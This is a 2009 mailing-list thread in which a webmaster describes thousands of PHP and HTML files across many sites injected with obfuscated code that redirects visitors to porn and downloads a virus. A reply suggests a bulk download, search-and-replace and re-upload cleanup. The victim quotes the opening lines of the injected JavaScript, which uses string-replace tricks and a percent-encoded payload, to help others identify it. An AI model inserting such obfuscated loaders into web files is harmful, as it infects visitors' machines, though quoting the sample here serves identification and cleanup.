thanks pete for your reply
yes files are changed in the end of every html file, php file in each and
every folder on around 50 separate websites a large encrypted code or iframe
was injected
i have 400 folders in ftp in one site with index.php and all 400 index.php
files are injected with this code and this is just 1 site there are 30 more
ftp accounts with 50 or 100 folders having html or php files injected with
this code. the total affected files might be around 3000 - 5000 or more
i am writing below the starting few lines of the code that is injected maybe
someone else have seen this code before i have removed the script tag that
was in the start
<!-- ad -->window['eDvWa0lZ'.replace(/[ZWDz0]/g, '')]
(window['eDvWa0lZ'.replace(/[ZWDz0]/g, '')]
('u(nTeTsmc7aTpmem'.replace(/[h\(7mT]/g,
''))('%66%75%6e%63%74%69%6f%6e%20%41
%50%6c%4c%41%28%41%50%6c%6c%29%7b%66
%75%6e%63%74%69%6f%6e%20%41%41
On Wed, Jan 14, 2009 at 3:36 AM, Pete <cgrp@xxxxxxxxxxxx> wrote:
> In message <eeadcf600901131158w517b308nd9e590eaf8b446c8@xxxxxxxxxxxxxx<eeadcf600901131158w517b308nd9e590eaf8b446c8%40mail.gmail.com>
> >,
> Farhan khalid <farhan2kf@xxxxxxxxx <farhan2kf%40gmail.com>> writes
>
> >Hi,
> >
> >Alot of my sites and clients sites were somehow hacked and injected with
> >some encrypted code that redirects users to porn site and downloads virus
> on
> >the system
> >
> >i am attaching the code sample if somebody wants to check.This code is at
> >the end of each php, html and asp files now i have to clean hundreds of
> >files and remove this code
>
> Your sample was blocked. However, are you sure that the files have been
> changed?
>
> Are you 100% sure that it isn't software that is adding the code to each
> file, as it is requested by the site visitors? I have seen that happen
> before.
>
> >can anyone tell me about some crawler script that can read every file in
> all
> >folders and subfolders and find this code remove it automatically as i
> need
> >to urgently fix this issue and downloading all files manually removing
> code
> >will take really long time
>
> I wouldn't have thought so. Automatically FTP everything down, a really
> big search and replace, and automatically FTP everything up again.
>
> It might take a few hours to run, but it shouldn't take you more than 15
> minutes "work time"
>
> --
> Pete Clark
>
> Advertise your events in Spain - local and free
> http://hotcosta.com/events.php
>
>
[Non-text portions of this message have been removed]
